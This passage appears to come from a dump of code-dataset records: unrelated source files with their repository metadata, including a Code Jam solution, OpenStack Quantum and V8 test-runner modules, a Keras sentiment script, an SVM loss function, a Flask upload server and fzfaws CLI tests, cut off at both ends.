[0, 0, 0, 0, 0, 1, 4, 7, 8, 8]
[0, 0, 0, 0, 0, 0, 1, 3, 4, 4]
[0, 0, 0, 0, 0, 0, 0, 1, 2, 2]
[0, 0, 0, 0, 0, 0, 0, 0, 1, 1]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
9
[1, 8, 29, 64, 99, 120, 127, 128, 128]
[0, 1, 7, 22, 42, 57, 63, 64, 64]
[0, 0, 1, 6, 16, 26, 31, 32, 32]
[0, 0, 0, 1, 5, 11, 15, 16, 16]
[0, 0, 0, 0, 1, 4, 7, 8, 8]
[0, 0, 0, 0, 0, 1, 3, 4, 4]
[0, 0, 0, 0, 0, 0, 1, 2, 2]
[0, 0, 0, 0, 0, 0, 0, 1, 1]
[0, 0, 0, 0, 0, 0, 0, 0, 1]
'''
| [
"grahamlustiber@gmail.com"
] | grahamlustiber@gmail.com |
47f0c143537b99ffb3e3284dfa05d57756f3b79d | 487ce91881032c1de16e35ed8bc187d6034205f7 | /codes/CodeJamCrawler/16_1_1_neat/16_1_1_DanielBraithwaite_last_word.py | f312da31370a6413f77cbed11a1a43de2b88ee5d | [] | no_license | DaHuO/Supergraph | 9cd26d8c5a081803015d93cf5f2674009e92ef7e | c88059dc66297af577ad2b8afa4e0ac0ad622915 | refs/heads/master | 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 | Python | UTF-8 | Python | false | false | 554 | py | def last_word(s):
w = s[0]
for i in range(1,len(s)):
si = ord(w[0])
ei = ord(w[len(w)-1])
ci = ord(s[i])
if ci >= si:
w = s[i] + w
else:
w = w + s[i]
return w
o = open('output.txt', 'w+')
f = open('A-large.in', 'r+')
##f = open('test.txt', 'r+')
N = int(f.readline())
for i in range(N):
s = f.readline().strip()
res = last_word(s)
print(res)
o.write("Case #" + str(i + 1) + ": " + str(res) + "\n")
f.close()
o.close()
| [
"[dhuo@tcd.ie]"
] | [dhuo@tcd.ie] |
7edd65620a859a56b61c8982fe8c8e7e7b8822cf | e8274f167fd219ef78241ba8ea89e5d5875ed794 | /cloud/quantum/quantum/api/v2/resource.py | 757d20061e74194d59943d327de57d095cd418a3 | [
"Apache-2.0"
] | permissive | virt2x/folsomCloud | 02db0147f7e0f2ab0375faf4f36ca08272084152 | e6fd612dd77f35a72739cf4d4750e9795c0fa508 | refs/heads/master | 2021-01-01T17:26:28.405651 | 2013-10-17T12:36:04 | 2013-10-17T12:36:04 | 13,647,787 | 0 | 1 | null | 2020-07-24T08:25:22 | 2013-10-17T12:10:24 | Python | UTF-8 | Python | false | false | 4,991 | py | # Copyright 2012 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Utility methods for working with WSGI servers redux
"""
import netaddr
import webob
import webob.dec
import webob.exc
from quantum.common import exceptions
from quantum import context
from quantum.openstack.common import jsonutils as json
from quantum.openstack.common import log as logging
from quantum import wsgi
LOG = logging.getLogger(__name__)
class Request(webob.Request):
    """Add some Openstack API-specific logic to the base webob.Request."""

    def best_match_content_type(self):
        # Only JSON is supported here; default to JSON when the Accept
        # header matches nothing.
        supported = ('application/json', )
        return self.accept.best_match(supported,
                                      default_match='application/json')

    @property
    def context(self):
        # Lazily attach an admin context to the WSGI environ.
        #Eventually the Auth[NZ] code will supply this. (mdragon)
        #when that happens this if block should raise instead.
        if 'quantum.context' not in self.environ:
            self.environ['quantum.context'] = context.get_admin_context()
        return self.environ['quantum.context']
def Resource(controller, faults=None, deserializers=None, serializers=None):
    """Represents an API entity resource and the associated serialization and
    deserialization logic.

    Returns a WSGI application (via webob.dec.wsgify) that routes the
    request to the matching controller action, deserializes the body,
    serializes the result, and maps exceptions to HTTP fault responses.

    faults: optional mapping of exception class -> webob HTTPException
            class used to translate controller errors.
    deserializers / serializers: optional content-type -> callable maps
            that override the XML/JSON defaults below.
    """
    default_deserializers = {'application/xml': wsgi.XMLDeserializer(),
                             'application/json': lambda x: json.loads(x)}
    default_serializers = {'application/xml': wsgi.XMLDictSerializer(),
                           'application/json': lambda x: json.dumps(x)}
    format_types = {'xml': 'application/xml',
                    'json': 'application/json'}
    # HTTP status overrides per action; anything else responds 200
    action_status = dict(create=201, delete=204)

    default_deserializers.update(deserializers or {})
    default_serializers.update(serializers or {})

    deserializers = default_deserializers
    serializers = default_serializers
    faults = faults or {}

    @webob.dec.wsgify(RequestClass=Request)
    def resource(request):
        # Pull the routing match dict produced by the router middleware.
        route_args = request.environ.get('wsgiorg.routing_args')
        if route_args:
            args = route_args[1].copy()
        else:
            args = {}

        # NOTE(jkoelker) by now the controller is already found, remove
        #                it from the args if it is in the matchdict
        args.pop('controller', None)
        fmt = args.pop('format', None)
        action = args.pop('action', None)
        # explicit .format extension wins over the Accept header
        content_type = format_types.get(fmt,
                                        request.best_match_content_type())
        deserializer = deserializers.get(content_type)
        serializer = serializers.get(content_type)

        try:
            if request.body:
                args['body'] = deserializer(request.body)

            method = getattr(controller, action)

            result = method(request=request, **args)
        except (ValueError, AttributeError,
                exceptions.QuantumException,
                netaddr.AddrFormatError) as e:
            # Known/validation errors: translate via the faults map when
            # possible, otherwise respond 500 with the error message.
            LOG.exception('%s failed' % action)
            body = serializer({'QuantumError': str(e)})
            kwargs = {'body': body, 'content_type': content_type}
            for fault in faults:
                if isinstance(e, fault):
                    raise faults[fault](**kwargs)
            raise webob.exc.HTTPInternalServerError(**kwargs)
        except webob.exc.HTTPException as e:
            # Controller raised an HTTP error directly: serialize its body
            # and re-raise it unchanged.
            LOG.exception('%s failed' % action)
            e.body = serializer({'QuantumError': str(e)})
            e.content_type = content_type
            raise
        except Exception as e:
            # NOTE(jkoelker) Everything else is 500
            LOG.exception('%s failed' % action)
            # Do not expose details of 500 error to clients.
            msg = _('Request Failed: internal server error while '
                    'processing your request.')
            body = serializer({'QuantumError': msg})
            kwargs = {'body': body, 'content_type': content_type}
            raise webob.exc.HTTPInternalServerError(**kwargs)
        status = action_status.get(action, 200)
        body = serializer(result)
        # NOTE(jkoelker) Comply with RFC2616 section 9.7
        if status == 204:
            content_type = ''
            body = None
        return webob.Response(request=request, status=status,
                              content_type=content_type,
                              body=body)
    return resource
| [
"quan.xu@intel.com"
] | quan.xu@intel.com |
f03153a59de4a234d11b84dcec0f9f4e0910c662 | a67f7ae56ff7fcbd1fe665c77e7efc1ba54b7675 | /TextClassification/testing_cnn_lstm.py | 0acec085b9a00d94499aa2be28bff009a73f4f50 | [] | no_license | thdiaman/deeplearning | a013d16c59932ccfe62d87012613093d3a46e9d3 | 9ddc46b6ad257ad0885d1d5dc8eb64589d618f2b | refs/heads/master | 2021-07-02T02:08:52.778443 | 2019-05-31T23:42:14 | 2019-05-31T23:42:14 | 133,405,896 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 931 | py | # Import basic libraries and keras
import json
from keras.models import load_model
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
# Restore the trained Keras model (swap in 'lstm_model.h5' to test the LSTM).
model = load_model('cnn_model.h5')
# Rebuild the tokenizer with the word index saved at training time so input
# text maps to the same integer ids the model was trained on.
with open('dictionary.json', 'r') as dictionary_file:
    dictionary = json.load(dictionary_file)
tokenizer = Tokenizer(num_words=3000)
tokenizer.word_index = dictionary
# Interactive loop: classify sentences until the user presses enter.
while 1:
    text = input('Input a sentence to evaluate its sentiment, or press enter to quit: ')
    if len(text) == 0:
        break
    # Convert to a padded id sequence matching the training input length (300).
    sequences = tokenizer.texts_to_sequences([text])
    padded_sequences = pad_sequences(sequences, maxlen=300)
    pred = model.predict(padded_sequences)
    # pred is the predicted P(positive); report the winning class with its
    # confidence. NOTE(review): max(pred, 1 - pred) relies on comparing
    # 1-element arrays -- assumes pred has shape (1, 1); confirm.
    print("The sentiment is %s (confidence: %.2f%%)" % ("positive" if pred > 0.5 else "negative", 100 * max(pred, 1 - pred)))
| [
"themisdiamantopoulos@hotmail.com"
] | themisdiamantopoulos@hotmail.com |
4b7fd03b0c233030ec89fb538722a130ae795def | e3df9942558c81f89cdc13a519f517bf8d403aa6 | /esm2m/setup.py | 1f93c6100b8f7558ecc7171b69dc3d4503d75b0d | [
"MIT"
] | permissive | ystochel/esm2m | a4de1f8164ada23d4c98f6b10bf121f5f7e9ff71 | 0a133dc69dd72ab8c4c7537632e070bf5a32c9a6 | refs/heads/master | 2022-12-03T13:46:12.202867 | 2020-08-14T01:56:27 | 2020-08-14T01:56:27 | 267,344,418 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 209 | py | from setuptools import find_packages, setup
# Package metadata for the PEI Summer Internship 2020 project; picks up every
# package found under the repository root via find_packages().
setup(
    name='src',
    packages=find_packages(),
    version='0.1.0',
    description='PEI Summer Internship 2020',
    author='ystochel',
    license='MIT',
)
| [
"ystochel@flyingfish.princeton.edu"
] | ystochel@flyingfish.princeton.edu |
007692cd016585291035ae82627b954f89929568 | 9be19b8015a1405235e0457756fcfa688f1f6797 | /Chapter-09/mad_libs.py | 0894e7ab2021d351bafc3e2ffabe36841d9fe2da | [] | no_license | SilentCruzer/Automate-the-boring-stuff-with-python | b2b5de6554e0958c143110f4f2bcbc209a8cbb36 | ad561a8cc500a88f38f083be4179345f61fbc952 | refs/heads/master | 2023-02-15T21:03:11.213267 | 2021-01-06T16:49:34 | 2021-01-06T16:49:34 | 323,024,714 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 368 | py | import sys, re
# Template tokens to fill in, in the order the user is prompted for them.
PLACEHOLDERS = ['ADJECTIVE', 'NOUN', 'ADVERB', 'VERB']

# Read the Mad Libs template text.
with open('mad_libs_text.txt') as template_file:
    story = template_file.read()

# Substitute every occurrence of every placeholder one at a time (left to
# right), asking the user for each replacement word.
for placeholder in PLACEHOLDERS:
    while placeholder in story:
        answer = input("Enter an " + placeholder.lower() + ": ")
        story = story.replace(placeholder, answer, 1)

print(story)

# Save the completed story alongside the template.
with open("mad_Libs_after.txt", 'w') as out_file:
    out_file.write(story)
| [
"radithykumar7@gmail.com"
] | radithykumar7@gmail.com |
b93919749d0ffe49d019f0a0385ed8d83d3592da | 600df3590cce1fe49b9a96e9ca5b5242884a2a70 | /v8/tools/testrunner/local/testsuite.py | f7fa19b20a0b5ce18abe0cd934fbbe12145291b8 | [
"BSD-3-Clause",
"SunPro",
"bzip2-1.0.6"
] | permissive | metux/chromium-suckless | efd087ba4f4070a6caac5bfbfb0f7a4e2f3c438a | 72a05af97787001756bae2511b7985e61498c965 | refs/heads/orig | 2022-12-04T23:53:58.681218 | 2017-04-30T10:59:06 | 2017-04-30T23:35:58 | 89,884,931 | 5 | 3 | BSD-3-Clause | 2022-11-23T20:52:53 | 2017-05-01T00:09:08 | null | UTF-8 | Python | false | false | 12,313 | py | # Copyright 2012 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import imp
import os
from . import commands
from . import statusfile
from . import utils
from ..objects import testcase
from variants import ALL_VARIANTS, ALL_VARIANT_FLAGS, FAST_VARIANT_FLAGS
# Variant names that are still run when a test is limited to fast variants.
FAST_VARIANTS = set(["default", "turbofan"])
# The single variant used when a test is limited to the standard variant.
STANDARD_VARIANT = set(["default"])
class VariantGenerator(object):
  """Decides which testing variants and flag sets apply to a test case.

  Status-file outcomes can restrict a test to the standard variant only or
  to the fast variants; otherwise every requested variant applies.
  """

  def __init__(self, suite, variants):
    self.suite = suite
    # Intersect the runner-requested variants with each known category.
    self.all_variants = ALL_VARIANTS & variants
    self.fast_variants = FAST_VARIANTS & variants
    self.standard_variant = STANDARD_VARIANT & variants

  def FilterVariantsByTest(self, testcase):
    """Return the set of variant names the given test should run in."""
    outcomes = testcase.outcomes
    if outcomes:
      if statusfile.OnlyStandardVariant(outcomes):
        return self.standard_variant
      if statusfile.OnlyFastVariants(outcomes):
        return self.fast_variants
    return self.all_variants

  def GetFlagSets(self, testcase, variant):
    """Return the flag sets for |variant|, honoring fast-only restrictions."""
    fast_only = testcase.outcomes and statusfile.OnlyFastVariants(
        testcase.outcomes)
    flag_table = FAST_VARIANT_FLAGS if fast_only else ALL_VARIANT_FLAGS
    return flag_table[variant]
class TestSuite(object):
  """Base class for a runnable collection of tests.

  A suite knows how to discover its tests, read its .status file, filter
  test cases, and classify test outputs. Concrete suites override at least
  ListTests() and GetFlagsForTestCase().
  """

  @staticmethod
  def LoadTestSuite(root, global_init=True):
    """Load the suite rooted at |root| via its testcfg.py, if present."""
    name = root.split(os.path.sep)[-1]
    f = None
    try:
      (f, pathname, description) = imp.find_module("testcfg", [root])
      module = imp.load_module("testcfg", f, pathname, description)
      return module.GetSuite(name, root)
    except ImportError:
      # Use default if no testcfg is present.
      return GoogleTestSuite(name, root)
    finally:
      if f:
        f.close()

  def __init__(self, name, root):
    # Note: This might be called concurrently from different processes.
    self.name = name  # string
    self.root = root  # string containing path
    self.tests = None  # list of TestCase objects
    self.rules = None  # dictionary mapping test path to list of outcomes
    self.wildcards = None  # dictionary mapping test paths to list of outcomes
    self.total_duration = None  # float, assigned on demand

  def shell(self):
    # Default executable used to run this suite's tests.
    return "d8"

  def suffix(self):
    # File extension of this suite's test sources.
    return ".js"

  def status_file(self):
    # Path of the status file listing expected outcomes per test.
    return "%s/%s.status" % (self.root, self.name)

  # Used in the status file and for stdout printing.
  def CommonTestName(self, testcase):
    if utils.IsWindows():
      return testcase.path.replace("\\", "/")
    else:
      return testcase.path

  def ListTests(self, context):
    """Discover and return this suite's TestCase objects (abstract)."""
    raise NotImplementedError

  def _VariantGeneratorFactory(self):
    """The variant generator class to be used."""
    return VariantGenerator

  def CreateVariantGenerator(self, variants):
    """Return a generator for the testing variants of this suite.

    Args:
      variants: List of variant names to be run as specified by the test
                runner.
    Returns: An object of type VariantGenerator.
    """
    return self._VariantGeneratorFactory()(self, set(variants))

  def PrepareSources(self):
    """Called once before multiprocessing for doing file-system operations.

    This should not access the network. For network access use the method
    below.
    """
    pass

  def DownloadData(self):
    # Hook for suites that need to fetch data over the network.
    pass

  def ReadStatusFile(self, variables):
    """Parse the status file, filling self.rules and self.wildcards."""
    with open(self.status_file()) as f:
      self.rules, self.wildcards = (
          statusfile.ReadStatusFile(f.read(), variables))

  def ReadTestCases(self, context):
    self.tests = self.ListTests(context)

  @staticmethod
  def _FilterSlow(slow, mode):
    # True when the test should be dropped given the slow-tests mode.
    return (mode == "run" and not slow) or (mode == "skip" and slow)

  @staticmethod
  def _FilterPassFail(pass_fail, mode):
    # True when the test should be dropped given the pass/fail-tests mode.
    return (mode == "run" and not pass_fail) or (mode == "skip" and pass_fail)

  def FilterTestCasesByStatus(self, warn_unused_rules,
                              slow_tests="dontcare",
                              pass_fail_tests="dontcare",
                              variants=False):
    """Apply status-file rules to self.tests, dropping skipped tests.

    Also merges each matching rule's outcomes into the test case and,
    optionally, warns about rules that matched no test.
    """
    # Use only variants-dependent rules and wildcards when filtering
    # respective test cases and generic rules when filtering generic test
    # cases.
    if not variants:
      rules = self.rules[""]
      wildcards = self.wildcards[""]
    else:
      # We set rules and wildcards to a variant-specific version for each test
      # below.
      rules = {}
      wildcards = {}
    filtered = []
    # Remember used rules as tuples of (rule, variant), where variant is "" for
    # variant-independent rules.
    used_rules = set()
    for t in self.tests:
      slow = False
      pass_fail = False
      testname = self.CommonTestName(t)
      variant = t.variant or ""
      if variants:
        rules = self.rules[variant]
        wildcards = self.wildcards[variant]
      if testname in rules:
        used_rules.add((testname, variant))
        # Even for skipped tests, as the TestCase object stays around and
        # PrintReport() uses it.
        t.outcomes = t.outcomes | rules[testname]
        if statusfile.DoSkip(t.outcomes):
          continue  # Don't add skipped tests to |filtered|.
        for outcome in t.outcomes:
          # "Flags: ..." outcomes carry extra command-line flags for the test.
          if outcome.startswith('Flags: '):
            t.flags += outcome[7:].split()
        slow = statusfile.IsSlow(t.outcomes)
        pass_fail = statusfile.IsPassOrFail(t.outcomes)
      skip = False
      for rule in wildcards:
        # Wildcard rules are prefix matches and must end with '*'.
        assert rule[-1] == '*'
        if testname.startswith(rule[:-1]):
          used_rules.add((rule, variant))
          t.outcomes = t.outcomes | wildcards[rule]
          if statusfile.DoSkip(t.outcomes):
            skip = True
            break  # "for rule in wildcards"
          slow = slow or statusfile.IsSlow(t.outcomes)
          pass_fail = pass_fail or statusfile.IsPassOrFail(t.outcomes)
      if (skip
          or self._FilterSlow(slow, slow_tests)
          or self._FilterPassFail(pass_fail, pass_fail_tests)):
        continue  # "for t in self.tests"
      filtered.append(t)
    self.tests = filtered
    if not warn_unused_rules:
      return
    # Report every status-file rule that never matched a test.
    if not variants:
      for rule in self.rules[""]:
        if (rule, "") not in used_rules:
          print("Unused rule: %s -> %s (variant independent)" % (
              rule, self.rules[""][rule]))
      for rule in self.wildcards[""]:
        if (rule, "") not in used_rules:
          print("Unused rule: %s -> %s (variant independent)" % (
              rule, self.wildcards[""][rule]))
    else:
      for variant in ALL_VARIANTS:
        for rule in self.rules[variant]:
          if (rule, variant) not in used_rules:
            print("Unused rule: %s -> %s (variant: %s)" % (
                rule, self.rules[variant][rule], variant))
        for rule in self.wildcards[variant]:
          if (rule, variant) not in used_rules:
            print("Unused rule: %s -> %s (variant: %s)" % (
                rule, self.wildcards[variant][rule], variant))

  def FilterTestCasesByArgs(self, args):
    """Filter test cases based on command-line arguments.

    An argument with an asterisk in the end will match all test cases
    that have the argument as a prefix. Without asterisk, only exact matches
    will be used with the exeption of the test-suite name as argument.
    """
    filtered = []
    globs = []
    exact_matches = []
    for a in args:
      argpath = a.split('/')
      if argpath[0] != self.name:
        continue
      if len(argpath) == 1 or (len(argpath) == 2 and argpath[1] == '*'):
        return  # Don't filter, run all tests in this suite.
      path = '/'.join(argpath[1:])
      if path[-1] == '*':
        path = path[:-1]
        globs.append(path)
      else:
        exact_matches.append(path)
    for t in self.tests:
      for a in globs:
        if t.path.startswith(a):
          filtered.append(t)
          break
      for a in exact_matches:
        if t.path == a:
          filtered.append(t)
          break
    self.tests = filtered

  def GetFlagsForTestCase(self, testcase, context):
    """Return the command-line flags to run |testcase| (abstract)."""
    raise NotImplementedError

  def GetSourceForTest(self, testcase):
    return "(no source available)"

  def IsFailureOutput(self, testcase):
    # Default failure criterion: a non-zero exit code.
    return testcase.output.exit_code != 0

  def IsNegativeTest(self, testcase):
    # Negative tests are expected to fail; none by default.
    return False

  def HasFailed(self, testcase):
    execution_failed = self.IsFailureOutput(testcase)
    if self.IsNegativeTest(testcase):
      # A negative test fails exactly when its execution succeeds.
      return not execution_failed
    else:
      return execution_failed

  def GetOutcome(self, testcase):
    """Classify a finished test as CRASH, TIMEOUT, FAIL or PASS."""
    if testcase.output.HasCrashed():
      return statusfile.CRASH
    elif testcase.output.HasTimedOut():
      return statusfile.TIMEOUT
    elif self.HasFailed(testcase):
      return statusfile.FAIL
    else:
      return statusfile.PASS

  def HasUnexpectedOutput(self, testcase):
    # A test without explicit outcomes is expected to PASS.
    outcome = self.GetOutcome(testcase)
    return not outcome in (testcase.outcomes or [statusfile.PASS])

  def StripOutputForTransmit(self, testcase):
    # Drop bulky stdout/stderr before sending results across processes when
    # the output matched expectations and is therefore not needed.
    if not self.HasUnexpectedOutput(testcase):
      testcase.output.stdout = ""
      testcase.output.stderr = ""

  def CalculateTotalDuration(self):
    """Sum and cache the durations of all tests in this suite."""
    self.total_duration = 0.0
    for t in self.tests:
      self.total_duration += t.duration
    return self.total_duration
class StandardVariantGenerator(VariantGenerator):
  """Variant generator that pins every test to the standard variant only."""

  def FilterVariantsByTest(self, testcase):
    # Ignore the test's status-file outcomes: always run just "default".
    return self.standard_variant
class GoogleTestSuite(TestSuite):
  """Suite whose tests live in a single googletest binary named after it.

  Tests are discovered by running the binary with --gtest_list_tests and
  parsing its "TestCase." / "  TestName" output format.
  """

  def __init__(self, name, root):
    super(GoogleTestSuite, self).__init__(name, root)

  def ListTests(self, context):
    shell = os.path.abspath(os.path.join(context.shell_dir, self.shell()))
    if utils.IsWindows():
      shell += ".exe"
    output = None
    for i in xrange(3):  # Try 3 times in case of errors.
      output = commands.Execute(context.command_prefix +
                                [shell, "--gtest_list_tests"] +
                                context.extra_flags)
      if output.exit_code == 0:
        break
      print "Test executable failed to list the tests (try %d).\n\nStdout:" % i
      print output.stdout
      print "\nStderr:"
      print output.stderr
      print "\nExit code: %d" % output.exit_code
    else:
      # for/else: all three attempts failed without a break.
      raise Exception("Test executable failed to list the tests.")
    tests = []
    test_case = ''
    for line in output.stdout.splitlines():
      test_desc = line.strip().split()[0]
      if test_desc.endswith('.'):
        # A line ending in '.' names the test case; subsequent lines name
        # the tests inside it.
        test_case = test_desc
      elif test_case and test_desc:
        test = testcase.TestCase(self, test_case + test_desc)
        tests.append(test)
    tests.sort(key=lambda t: t.path)
    return tests

  def GetFlagsForTestCase(self, testcase, context):
    # Run exactly one gtest, with a deterministic seed and timing output off.
    return (testcase.flags + ["--gtest_filter=" + testcase.path] +
            ["--gtest_random_seed=%s" % context.random_seed] +
            ["--gtest_print_time=0"] +
            context.mode_flags)

  def _VariantGeneratorFactory(self):
    return StandardVariantGenerator

  def shell(self):
    # The gtest binary shares the suite's name.
    return self.name
| [
"enrico.weigelt@gr13.net"
] | enrico.weigelt@gr13.net |
def svm_loss_vectorized(W, X, y, reg):
    """
    Structured SVM loss function, vectorized implementation.

    Inputs and outputs are the same as svm_loss_naive:
      - W: (D, C) array of weights.
      - X: (N, D) array of N training samples.
      - y: (N,) array of integer labels with 0 <= y[i] < C.
      - reg: L2 regularization strength.

    Returns:
      loss: scalar hinge loss (delta = 1) plus reg * sum(W * W).
      dW: gradient of the loss with respect to W, same shape as W.
    """
    num_train = X.shape[0]
    rows = np.arange(num_train)

    # Per-sample class scores and the score of each sample's correct class.
    scores = X.dot(W)                                   # (N, C)
    correct = scores[rows, y]                           # (N,)

    # Hinge margins with delta = 1; zero out the correct-class column so it
    # contributes nothing to the loss or the violation counts.
    margins = np.maximum(0.0, scores - correct[:, np.newaxis] + 1.0)
    margins[rows, y] = 0.0

    loss = margins.sum() / num_train
    loss += reg * np.sum(W * W)

    # Gradient: every violating class j (margin > 0) pulls +x_i on column j,
    # and the correct class is pushed by -x_i once per violating class.
    indicator = (margins > 0).astype(np.float64)        # (N, C)
    indicator[rows, y] = -indicator.sum(axis=1)
    dW = X.T.dot(indicator) / num_train
    dW += reg * 2 * W

    return loss, dW
"TiwazBiu@gmail.com"
] | TiwazBiu@gmail.com |
2c859a6f2acfe8a6f7648e36a4e2293e29ec40bf | a5875775b1ccaf45d18945c719feb398f45dbc93 | /server.py | e0b0f1bf608823e2b2e9b3d6e7072bdac6c76f99 | [] | no_license | bananacatsky/myu | 694541cf9c1872e76307a221231a42d4e36227dd | 2c38c6966d2b7b523a4d05001864298f94143b34 | refs/heads/master | 2020-09-06T22:00:31.225375 | 2019-06-23T23:18:09 | 2019-06-23T23:18:09 | 220,567,879 | 1 | 0 | null | 2019-11-09T00:16:29 | 2019-11-09T00:16:28 | null | UTF-8 | Python | false | false | 1,377 | py | import os
from flask import Flask, request, redirect, url_for
from werkzeug.utils import secure_filename
from flask import send_from_directory
from process import mix
# Directory (relative to the working directory) where uploads are stored.
UPLOAD_FOLDER = r'uploads'
# File extensions accepted by the upload form.
ALLOWED_EXTENSIONS = {'txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'}
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
def allowed_file(filename):
    """Return True if *filename* has an extension in ALLOWED_EXTENSIONS.

    The comparison is case-insensitive (so ``IMG.PNG`` is accepted), and a
    name without any dot is rejected outright.
    """
    return '.' in filename and \
        filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
@app.route('/', methods=['GET', 'POST'])
def upload_file():
    """Serve the upload form (GET) or accept and process an image (POST).

    On a valid POST the file is saved under UPLOAD_FOLDER, fed to
    process.mix(), and the client is redirected to the download route.
    """
    if request.method == 'POST':
        file = request.files['file']
        if file and allowed_file(file.filename):
            # Sanitize the client-supplied name before using it in a path.
            filename = secure_filename(file.filename)
            savepath = os.path.join(app.config['UPLOAD_FOLDER'], filename)
            file.save(savepath)
            # NOTE(review): the returned path is never used -- the redirect
            # below hard-codes 'out.mp4', which mix() presumably writes into
            # the upload folder. Confirm against process.mix().
            video_path = mix(savepath)
            return redirect(url_for('uploaded_file', filename='out.mp4'))
    # GET request (or an invalid upload): render a minimal inline form.
    return '''
    <!doctype html>
    <title>Upload image</title>
    <h1>Upload image</h1>
    <form action="" method=post enctype=multipart/form-data>
    <p><input type=file name=file>
    <input type=submit value="Upload image">
    </form>
    '''
@app.route('/uploads/<filename>')
def uploaded_file(filename):
    # NOTE(review): the <filename> URL segment is ignored -- every request
    # downloads the single processed video "out.mp4". Confirm this is
    # intentional before exposing the route more widely.
    return send_from_directory(app.config['UPLOAD_FOLDER'], "out.mp4", as_attachment=True)
if __name__ == '__main__':
    # Make sure the upload directory exists before the server accepts files.
    os.makedirs("uploads", exist_ok=True)
    app.run()
| [
"sknek@ya.ru"
] | sknek@ya.ru |
0331c7d64d9c4561496104cd1e73f30ef345945b | 403a8c7d9ba2956c3f5873d0721921e0d8ae7c65 | /tests/test_cli.py | 13cee7104e6617fae0738f12d22c77060adeb91a | [
"MIT"
] | permissive | kazhala/fzf.aws | b0c83f0ac47f1b2da0d0b064d6a688ba2e69028c | 4abefb2301f7b489b11ed3f0b303faafa5941d5b | refs/heads/master | 2021-07-05T00:50:12.632284 | 2021-05-25T23:09:51 | 2021-05-25T23:09:51 | 242,327,229 | 68 | 3 | MIT | 2021-03-25T23:42:00 | 2020-02-22T11:09:11 | Python | UTF-8 | Python | false | false | 3,065 | py | from botocore.exceptions import ClientError
from fzfaws.utils.exceptions import InvalidFileType
import os
from fzfaws.utils.fileloader import FileLoader
import unittest
from unittest.mock import patch
from fzfaws.cli import main, copy_config
import sys
import io
from pathlib import Path
import tempfile
class TestCLI(unittest.TestCase):
    """Tests for the fzfaws command-line entry point (fzfaws.cli.main)."""

    def setUp(self):
        # Capture stdout so usage/error output can be asserted on.
        # (The attribute name "capturedOuput" keeps the existing misspelling.)
        self.capturedOuput = io.StringIO()
        sys.stdout = self.capturedOuput
        # Load the repository's default config so argument defaults resolve.
        config_path = Path(__file__).resolve().parent.joinpath("../fzfaws/fzfaws.yml")
        fileloader = FileLoader()
        fileloader.load_config_file(config_path=str(config_path))

    def tearDown(self):
        # Restore the real stdout for subsequent tests.
        sys.stdout = sys.__stdout__

    @patch("fzfaws.cli.s3")
    @patch("fzfaws.cli.ec2")
    @patch("fzfaws.cli.cloudformation")
    def test_subparser(self, mocked_cloudformation, mocked_ec2, mocked_s3):
        """Each service subcommand dispatches its remaining argv (plus any
        config-injected defaults) to the matching service handler."""
        sys.argv = [__file__, "cloudformation", "-h"]
        main()
        mocked_cloudformation.assert_called_once_with(["-h"])
        sys.argv = [__file__, "ec2", "ssh", "-A"]
        main()
        mocked_ec2.assert_called_once_with(["ssh", "-A"])
        mocked_ec2.reset_mock()
        # "--wait" comes from the loaded default config.
        sys.argv = [__file__, "ec2", "start"]
        main()
        mocked_ec2.assert_called_once_with(["start", "--wait"])
        # "--hidden" likewise comes from the default config.
        sys.argv = [__file__, "s3", "download"]
        main()
        mocked_s3.assert_called_once_with(["download", "--hidden"])

    @patch("fzfaws.cli.copy_config")
    def test_parser(self, mocked_copy):
        """Top-level flags: -h prints usage, --copy-config copies the config,
        and no arguments at all also prints usage; all exit via SystemExit."""
        sys.argv = [__file__, "-h"]
        self.assertRaises(SystemExit, main)
        self.assertRegex(
            self.capturedOuput.getvalue(), r"usage: fzfaws .*",
        )
        sys.argv = [__file__, "--copy-config"]
        self.assertRaises(SystemExit, main)
        mocked_copy.assert_called_once()
        # Reset the capture buffer before checking the no-argument output.
        self.capturedOuput.truncate(0)
        self.capturedOuput.seek(0)
        sys.argv = [__file__]
